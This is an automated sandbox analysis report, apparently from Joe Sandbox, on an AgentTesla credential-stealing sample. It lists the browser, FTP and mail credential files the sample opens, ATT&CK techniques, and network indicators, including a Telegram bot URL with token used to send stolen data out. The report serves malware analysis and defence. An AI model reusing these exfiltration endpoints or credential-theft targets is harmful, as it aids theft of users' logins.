                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeQueries volume information: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.LisectAVT_2403002A_127.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5396, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5020, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.LisectAVT_2403002A_127.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5396, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5020, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.LisectAVT_2403002A_127.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5396, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5020, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.LisectAVT_2403002A_127.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5396, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5020, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.LisectAVT_2403002A_127.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5396, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5020, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Web Service
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      21
                      Input Capture
                      24
                      System Information Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      1
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      1
                      Query Registry
                      SMB/Windows Admin Shares1
                      Email Collection
                      11
                      Encrypted Channel
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                      Software Packing
                      NTDS111
                      Security Software Discovery
                      Distributed Component Object Model21
                      Input Capture
                      3
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Timestomp
                      LSA Secrets1
                      Process Discovery
                      SSH1
                      Clipboard Data
                      14
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading
                      Cached Domain Credentials141
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                      Virtualization/Sandbox Evasion
                      Proc Filesystem1
                      System Network Configuration Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                      Process Injection
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      LisectAVT_2403002A_127.exe100%AviraTR/Spy.AgentTesla.kjtmf
                      LisectAVT_2403002A_127.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://api.ipify.org/0%URL Reputationsafe
                      https://api.ipify.org0%URL Reputationsafe
                      https://account.dyn.com/0%URL Reputationsafe
                      https://api.ipify.org/t0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://www.gnu.org/licenses/why-not-lgpl.html0%Avira URL Cloudsafe
                      https://api.telegram.org0%Avira URL Cloudsafe
                      https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument0%Avira URL Cloudsafe
                      https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/0%Avira URL Cloudsafe
                      https://fsf.org/0%Avira URL Cloudsafe
                      http://api.telegram.org0%Avira URL Cloudsafe
                      https://download.alegsoftware.ga/ws_switches/contatore/ltromatic.ttf0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.ipify.org
                      104.26.13.205
                      truefalse
                        unknown
                        api.telegram.org
                        149.154.167.220
                        truetrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                          • URL Reputation: safe
                          unknown
                          https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocumentfalse
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.ipify.orgLisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://account.dyn.com/LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://api.telegram.orgLisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000325A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003668000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000031EE000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000334B000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000341E000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003309000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003351000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          https://www.gnu.org/licenses/LisectAVT_2403002A_127.exefalse
                            unknown
                            https://fsf.org/LisectAVT_2403002A_127.exefalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.gnu.org/licenses/why-not-lgpl.htmlLisectAVT_2403002A_127.exefalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.ipify.org/tLisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000030E1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://api.telegram.orgLisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003668000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000334B000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000341E000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameLisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000030E1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://download.alegsoftware.ga/ws_switches/contatore/ltromatic.ttfLisectAVT_2403002A_127.exefalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            149.154.167.220
                            api.telegram.orgUnited Kingdom
                            62041TELEGRAMRUtrue
                            104.26.13.205
                            api.ipify.orgUnited States
                            13335CLOUDFLARENETUSfalse
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1482510
                            Start date and time:2024-07-25 23:58:18 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 9m 20s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:8
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:LisectAVT_2403002A_127.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@3/1@4/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 114
                            • Number of non-executed functions: 2
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • VT rate limit hit for: LisectAVT_2403002A_127.exe
                            TimeTypeDescription
                            17:59:08API Interceptor11538794x Sleep call for process: LisectAVT_2403002A_127.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            149.154.167.220LisectAVT_2403002A_74.exeGet hashmaliciousAgentTeslaBrowse
                              New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                LisectAVT_2403002B_4.exeGet hashmaliciousAsyncRAT, Neshta, StormKitty, WorldWind StealerBrowse
                                  Payment_Advice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                        Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                            Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                              Lisect_AVT_24003_G1B_33.exeGet hashmaliciousUnknownBrowse
                                                104.26.13.205SecuriteInfo.com.Win64.Evo-gen.28044.10443.exeGet hashmaliciousUnknownBrowse
                                                • api.ipify.org/
                                                vstdlib_s64.dll.dllGet hashmaliciousQuasarBrowse
                                                • api.ipify.org/
                                                golang-modules.exeGet hashmaliciousUnknownBrowse
                                                • api.ipify.org/
                                                SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
                                                • api.ipify.org/
                                                242764.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                                • api.ipify.org/?format=wef
                                                Ransom.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                                • api.ipify.org/
                                                ld.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                                • api.ipify.org/
                                                ReturnLegend.exeGet hashmaliciousStealitBrowse
                                                • api.ipify.org/?format=json
                                                SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                • api.ipify.org/
                                                Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                • api.ipify.org/?format=json
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                api.ipify.orgLisectAVT_2403002A_133.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                LisectAVT_2403002A_2.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                LisectAVT_2403002A_460.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.13.205
                                                LisectAVT_2403002A_481.exeGet hashmaliciousLuna Grabber, Luna LoggerBrowse
                                                • 104.26.12.205
                                                LisectAVT_2403002A_63.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                LisectAVT_2403002A_59.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.13.205
                                                LisectAVT_2403002A_74.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.13.205
                                                SWIFT COPY.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                Re_ Q22689 - 07.24.2024_Conduit Construction Network Ltd_Today.emlGet hashmaliciousUnknownBrowse
                                                • 172.67.74.152
                                                LisectAVT_2403002B_385.exeGet hashmaliciousAgentTesla, BdaejecBrowse
                                                • 104.26.12.205
                                                api.telegram.orgLisectAVT_2403002A_74.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                LisectAVT_2403002B_4.exeGet hashmaliciousAsyncRAT, Neshta, StormKitty, WorldWind StealerBrowse
                                                • 149.154.167.220
                                                Payment_Advice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 149.154.167.220
                                                Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 149.154.167.220
                                                Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 149.154.167.220
                                                Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 149.154.167.220
                                                Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                Lisect_AVT_24003_G1B_33.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                TELEGRAMRULisectAVT_2403002A_138.exeGet hashmaliciousVidarBrowse
                                                • 149.154.167.99
                                                LisectAVT_2403002A_425.dllGet hashmaliciousUnknownBrowse
                                                • 149.154.167.99
                                                LisectAVT_2403002A_425.dllGet hashmaliciousUnknownBrowse
                                                • 149.154.167.99
                                                LisectAVT_2403002A_74.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                LisectAVT_2403002B_181.exeGet hashmaliciousPrivateLoaderBrowse
                                                • 149.154.167.99
                                                LisectAVT_2403002B_272.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                • 149.154.167.99
                                                LisectAVT_2403002B_344.exeGet hashmaliciousBdaejec, VidarBrowse
                                                • 149.154.167.99
                                                LisectAVT_2403002B_4.exeGet hashmaliciousAsyncRAT, Neshta, StormKitty, WorldWind StealerBrowse
                                                • 149.154.167.220
                                                Payment_Advice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 149.154.167.220
                                                CLOUDFLARENETUSLisectAVT_2403002A_133.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                LisectAVT_2403002A_147.exeGet hashmaliciousBlank GrabberBrowse
                                                • 162.159.138.232
                                                LisectAVT_2403002A_155.exeGet hashmaliciousUnknownBrowse
                                                • 172.67.202.72
                                                LisectAVT_2403002A_161.exeGet hashmaliciousLuna Grabber, Luna LoggerBrowse
                                                • 162.159.133.233
                                                LisectAVT_2403002A_162.exeGet hashmaliciousUnknownBrowse
                                                • 104.21.85.44
                                                https://aecoa.racipens.su/ievqefkwtdjogsyjfdbfnprzYkzLoDtSZBZFTQIDNBMGDEMRMWVOLGXOOCCPHOBAHWORBTIQHFOUAGEIrstXEZnKMUIf12KAT7V5Wwx35Get hashmaliciousUnknownBrowse
                                                • 172.67.170.95
                                                LisectAVT_2403002A_2.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                https://taf7.rphortan.com/xV5YqZuT/#Xjeffrey.laws@99restaurants.comGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                • 104.17.25.14
                                                LisectAVT_2403002A_210.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                • 104.16.123.96
                                                Jeffrey.laws Replay VM (01m27sec).docxGet hashmaliciousHTMLPhisherBrowse
                                                • 172.64.151.101
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
